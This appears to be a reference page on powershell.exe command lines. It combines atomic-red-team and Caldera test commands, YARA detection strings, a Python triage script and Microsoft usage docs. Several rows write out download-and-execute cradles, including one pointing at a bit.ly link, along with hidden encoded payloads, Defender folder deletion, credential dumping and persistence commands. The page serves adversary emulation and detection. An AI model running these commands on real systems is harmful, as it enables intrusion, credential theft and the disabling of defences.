atomic-red-team T1059.001.md powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX" MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md powershell.exe -version 2 -Command Write-Host $PSVersion MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md Executes powershell.exe with variations of the -Command parameter MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md Executes powershell.exe with variations of the -EncodedCommand parameter MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md powershell.exe -e #{obfuscated_code} MIT License. © 2018 Red Canary
atomic-red-team T1123.md powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md Spawns a powershell.exe process as a child of the current process. MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md | file_path | File path or name of process to spawn | Path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe| MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md Creates a notepad.exe process and then spawns a powershell.exe process as a child of it. MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md mshta.exe "about:'" MIT License. © 2018 Red Canary
atomic-red-team T1543.003.md sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c "write-host 'T1543.003 Test'"" MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md | thing_to_execute | Thing to Run | Path | powershell.exe| MIT License. © 2018 Red Canary
atomic-red-team T1564.003.md On Windows, there are a variety of features in scripting languages in Windows, such as PowerShell, Jscript, and Visual Basic to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019) MIT License. © 2018 Red Canary
atomic-red-team T1564.003.md | powershell_command | Command to launch calc.exe from a hidden PowerShell Window | String | powershell.exe -WindowStyle hidden calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1569.002.md Upon successful execution, cmd.exe creates a new service using sc.exe that will start powershell.exe to create a new file art-marker.txt MIT License. © 2018 Red Canary
atomic-red-team T1569.002.md | executable_command | Command to execute as a service | String | %COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt| MIT License. © 2018 Red Canary
atomic-red-team T1574.001.md Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path. MIT License. © 2018 Red Canary
atomic-red-team T1574.001.md copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe MIT License. © 2018 Red Canary
atomic-red-team T1588.002.md #{local_folder}#{local_executable} "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run MIT License. © 2018 Red Canary
signature-base apt_apt34.yar $x3 = "powershell.exe -exec bypass -enc " + ${global:$http_ag} +" wide CC BY-NC 4.0
signature-base apt_fin7.yar $x3 = "\par \tab \tab \tab sh.Run "powershell.exe -NoE -NoP -NonI -ExecutionPolicy Bypass -w Hidden -File " & pToPSCb, 0, False" fullword ascii CC BY-NC 4.0
signature-base apt_greenbug.yar $s1 = "powershell.exe -nologo -windowstyle hidden -c "Set-ExecutionPolicy -scope currentuser" fullword ascii CC BY-NC 4.0
signature-base apt_greenbug.yar $s2 = "powershell.exe -c "Set-ExecutionPolicy -scope currentuser -ExecutionPolicy unrestricted -f; . "" fullword ascii CC BY-NC 4.0
signature-base apt_lazarus_dec17.yar $x1 = "$ProID = Start-Process powershell.exe -PassThru -WindowStyle Hidden -ArgumentList" fullword ascii CC BY-NC 4.0
signature-base apt_lazarus_dec17.yar $x5 = "/tr "powershell.exe -ep bypass -windowstyle hidden -file " ascii CC BY-NC 4.0
signature-base apt_magichound.yar $s1 = "powershell.exe " fullword ascii CC BY-NC 4.0
signature-base apt_middle_east_talosreport.yar $x1 = "objWShell.Run "powershell.exe -ExecutionPolicy Bypass -File ""%appdata%""\sys.ps1", 0 " fullword ascii CC BY-NC 4.0
signature-base apt_molerats_jul17.yar $x1 = "powershell.exe -nop -c "iex" nocase ascii CC BY-NC 4.0
signature-base apt_ncsc_report_04_2018.yar $ = "powershell.exe" ascii CC BY-NC 4.0
signature-base apt_oilrig.yar $x2 = "wss.Run "powershell.exe " & Chr(34) & "& {waitfor haha /T 2}" & Chr(34), 0" fullword ascii CC BY-NC 4.0
signature-base apt_oilrig.yar $x1 = "wss.Run "powershell.exe " & Chr(34) & "& {(Get-Content $env:Public\Libraries\update.vbs) -replace '__',(Get-Random) | Set-C" ascii CC BY-NC 4.0
signature-base apt_oilrig.yar $x1 = "Powershell.exe -exec bypass -file ${global:$address1}" CC BY-NC 4.0
signature-base apt_unc2447_sombrat.yar $x1 = "powershell.exe -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([IO.File]::" ascii CC BY-NC 4.0
signature-base apt_unc2447_sombrat.yar $x2 = "wwansvc.txt')))" | powershell.exe -" ascii fullword CC BY-NC 4.0
signature-base apt_wilted_tulip.yar $x1 = "powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+" ascii CC BY-NC 4.0
signature-base gen_empire.yar $s2 = "$PowershellExe=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'" fullword ascii CC BY-NC 4.0
signature-base gen_metasploit_payloads.yar $s1 = "powershell.exe -nop -w hidden -e" ascii CC BY-NC 4.0
signature-base gen_metasploit_payloads.yar $x1 = "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e" ascii CC BY-NC 4.0
signature-base gen_metasploit_payloads.yar $s1 = ".ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then" fullword ascii CC BY-NC 4.0
signature-base gen_powershell_susp.yar $p1 = "powershell.exe" fullword ascii CC BY-NC 4.0
signature-base gen_powershell_susp.yar $s4 = "powershell.exe -w hidden -ep bypass -Enc" ascii CC BY-NC 4.0
signature-base gen_powershell_susp.yar $s6 = "powershell.exe reg add HKCU\software\microsoft\windows\currentversion\run" nocase CC BY-NC 4.0
signature-base gen_powershell_susp.yar $s1 = "POwErSHELl.ExE" fullword ascii nocase CC BY-NC 4.0
signature-base gen_powershell_susp.yar $x1 = "Process.Create("powershell.exe -nop -w hidden" fullword ascii nocase CC BY-NC 4.0
signature-base gen_powershell_susp.yar $x2 = ".Run"powershell.exe -nop -w hidden -c ""IEX " ascii CC BY-NC 4.0
signature-base gen_powershell_susp.yar $x1 = ".Run "powershell.exe -nop -w hidden -e " ascii CC BY-NC 4.0
signature-base gen_powershell_susp.yar $x2 = "FileExists(path + "\..\powershell.exe")" fullword ascii CC BY-NC 4.0
signature-base gen_ps_empire_eval.yar $s2 = "powershell.exe" ascii fullword CC BY-NC 4.0
signature-base gen_webshells.yar $exec_shell2 = "powershell.exe" nocase wide ascii CC BY-NC 4.0
signature-base gen_winpayloads.yar $x4 = "powershell.exe -WindowStyle Hidden -enc JABjAGwAaQBlAG4AdAA" ascii CC BY-NC 4.0
signature-base gen_win_privesc.yar $x1 = "# powershell.exe -executionpolicy bypass -file folderperm.ps1" fullword ascii CC BY-NC 4.0
signature-base gen_wmi_implant.yar $x5 = "-Command 'powershell.exe -command "Enable-PSRemoting" fullword ascii CC BY-NC 4.0
signature-base thor-hacktools.yar $s1 = "[*] Looks like we're 64bit, using regular powershell.exe" ascii wide CC BY-NC 4.0
stockpile 702bfdd2-9947-4eda-b551-c3a1ea9a59a2.yml powershell.exe -c "Get-WmiObject -class win32_operatingsystem | select -property * | export-csv msdebug.log"; Apache-2.0
stockpile e5f9de8f-3df1-4e78-ad92-a784e3f6770d.yml Copy-Item C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Temp\debug.exe; Apache-2.0
stockpile 315cedf1-4a3a-4015-b63f-149d64bacbbc.yml start powershell.exe -ArgumentList "-NoP","-StA","-ExecutionPolicy","bypass",".\Emulate-Administrator-Tasks.ps1" Apache-2.0
stockpile bfff9006-d1fb-46ce-b173-92cb04e9a031.yml powershell.exe -c IEX (New-Object Net.Webclient).downloadstring("https://bit.ly/33H0QXi") Apache-2.0
stockpile ece5dde3-d370-4c20-b213-a1f424aa8d03.yml wmic /node:"#{remote.host.fqdn}" /user:"#{domain.user.name}" /password:"#{domain.user.password}" process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}"; Apache-2.0
stockpile 110cea7a-5b03-4443-92ee-7ccefaead451.yml $action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "$commandString"; Apache-2.0
stockpile 68235976-2404-42a8-9105-68230cfef562.yml powershell.exe -ep bypass -c "Invoke-MemeKatz.ps1" Apache-2.0
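
The rows above share a small set of command-line features: abbreviated switches (-nop, -w, -ep, -exec, -e, -enc), a hidden window, an execution policy of bypass or unrestricted, an -EncodedCommand payload, and a script body built around IEX with a download cradle or a FromBase64String decode. Because -ExecutionPolicy and -WindowStyle are arguments the caller chooses per invocation, the rules treat them as indicators rather than as controls. The following is an added example, not code from atomic-red-team, signature-base, stockpile or Microsoft: a Python triage routine that normalises the switches (powershell.exe accepts any unambiguous prefix of a switch name; the prefix matching here is an approximation, not a copy of powershell.exe's parser), decodes -EncodedCommand arguments (base64 of the script as UTF-16LE) and reports which of those indicators a command line carries. The sample command lines are constructed, adapted from the rows above with the remote URL replaced by a reserved example host; the `-enc JABjAGwAaQBlAG4AdAA` string is the one from gen_winpayloads.yar and decodes to `$client`.

```python
"""Triage powershell.exe command lines from process-creation telemetry.

Added example for this page: not code from atomic-red-team, signature-base,
stockpile or Microsoft. Switch names come from the powershell.exe usage text;
the prefix matching is an approximation of powershell.exe's own (assumption).
"""
import base64
import re

# Canonical switch names listed in powershell.exe's usage text (lower-cased).
SWITCHES = [
    "psconsolefile", "version", "nologo", "noexit", "sta", "mta", "noprofile",
    "noninteractive", "inputformat", "outputformat", "windowstyle",
    "encodedcommand", "configurationname", "file", "executionpolicy", "command",
]
# Short forms seen in the rows above that are not unambiguous prefixes.
ALIASES = {
    "e": "encodedcommand", "ec": "encodedcommand", "enc": "encodedcommand",
    "ep": "executionpolicy", "exec": "executionpolicy", "ex": "executionpolicy",
    "c": "command", "w": "windowstyle", "win": "windowstyle", "f": "file",
}
TAKES_VALUE = {
    "psconsolefile", "version", "inputformat", "outputformat", "windowstyle",
    "encodedcommand", "configurationname", "file", "executionpolicy", "command",
}
# Script-body patterns drawn from the signature-base strings above.
SCRIPT_INDICATORS = {
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "download_cradle": re.compile(
        r"net\.webclient|downloadstring|downloadfile|msxml2\.serverxmlhttp", re.I),
    "base64_in_script": re.compile(r"frombase64string", re.I),
    "credential_dump": re.compile(r"invoke-mimikatz|-dumpcreds", re.I),
    "run_key_persistence": re.compile(r"reg add .*currentversion\\run", re.I),
}
TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline):
    """Split on whitespace, keeping double-quoted spans as single tokens."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in TOKEN.finditer(cmdline)]


def resolve_switch(token):
    """Map '-nop', '/ep', '-ExecutionPolicy', ... to a canonical name, else None."""
    if not token or token[0] not in "-/":
        return None
    name = token[1:].lower()
    if name in ALIASES:
        return ALIASES[name]
    matches = [s for s in SWITCHES if s.startswith(name)]
    return matches[0] if len(matches) == 1 else None


def decode_encoded_command(b64):
    """-EncodedCommand is base64 of the script as UTF-16LE; restore stripped padding."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16-le", errors="replace")


def encode_command(script):
    """Build an -EncodedCommand argument the way powershell.exe expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def triage(cmdline):
    """Return the normalised switches, the recovered script body and indicator names."""
    tokens = tokenize(cmdline)
    switches, script, i = {}, None, 1          # tokens[0] is the image path
    while i < len(tokens):
        sw = resolve_switch(tokens[i])
        if sw is None:                          # leading non-switch text is the -Command body
            script = " ".join(tokens[i:])
            break
        value = None
        if sw in TAKES_VALUE and i + 1 < len(tokens):
            value = tokens[i + 1]
            i += 1
        switches[sw] = value
        i += 1
        if sw == "command":                     # everything after -Command is script, not switches
            script = " ".join([value] + tokens[i:]) if value is not None else ""
            break
    if switches.get("encodedcommand"):
        script = decode_encoded_command(switches["encodedcommand"])
    indicators = []
    if (switches.get("windowstyle") or "").lower() == "hidden":
        indicators.append("hidden_window")
    if (switches.get("executionpolicy") or "").lower() in ("bypass", "unrestricted"):
        indicators.append("executionpolicy_bypass")
    if "encodedcommand" in switches:
        indicators.append("encoded_command")
    indicators += [name for name, pat in SCRIPT_INDICATORS.items()
                   if script and pat.search(script)]
    return {"switches": switches, "script": script, "indicators": indicators}


# Constructed sample command lines adapted from the rows above; the URL is a
# reserved example host and the encoded string is the one from gen_winpayloads.yar.
SAMPLES = [
    "powershell.exe -nop -w hidden -e JABjAGwAaQBlAG4AdAA",
    'powershell.exe -exec bypass -noprofile "IEX (New-Object Net.WebClient)'
    ".DownloadString('http://example.invalid/a.ps1'); Invoke-Mimikatz -DumpCreds\"",
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    "-NoProfile -ExecutionPolicy Restricted -File C:\\scripts\\inventory.ps1",
    "powershell.exe reg add HKCU\\software\\microsoft\\windows\\currentversion\\run "
    "/v updater /t REG_SZ /d C:\\Users\\Public\\updater.exe",
]

if __name__ == "__main__":
    for line in SAMPLES:
        result = triage(line)
        print(f"{line}\n  indicators={result['indicators']} script={result['script']!r}")
```

The third sample, a profile-less run of a script under the Restricted policy, produces no indicators: it is the same switch syntax the Microsoft text below documents, and the difference from the first two lines lies entirely in the values the caller chose. The triage is deliberately narrow; a renamed copy of the binary (T1574.001 and the stockpile debug.exe row above) is not visible in the command line at all and needs the image's original file name or hash from the telemetry instead.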

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


PowerShell

Windows PowerShell is a task-based command-line shell and scripting language designed especially for system administration. Built on the .NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows.

Using PowerShell.exe

The PowerShell.exe command-line tool starts a Windows PowerShell session in a Command Prompt window. When you use PowerShell.exe, you can use its optional parameters to customize the session. For example, you can start a session that uses a particular execution policy or one that excludes a Windows PowerShell profile. Otherwise, the session is the same as any session that is started in the Windows PowerShell console.

  • To start a Windows PowerShell session in a Command Prompt window, type PowerShell. A PS prefix is added to the command prompt to indicate that you are in a Windows PowerShell session.

  • To start a session with a particular execution policy, use the ExecutionPolicy parameter, and type:

      PowerShell.exe -ExecutionPolicy Restricted
    
  • To start a Windows PowerShell session without your Windows PowerShell profiles, use the NoProfile parameter, and type:

      PowerShell.exe -NoProfile
    
  • To see the PowerShell.exe help file, type:

      PowerShell.exe -help
      PowerShell.exe -?
      PowerShell.exe /?
    
  • To end a Windows PowerShell session in a Command Prompt window, type exit. The typical command prompt returns.


MIT License. Copyright (c) 2020-2021 Strontic.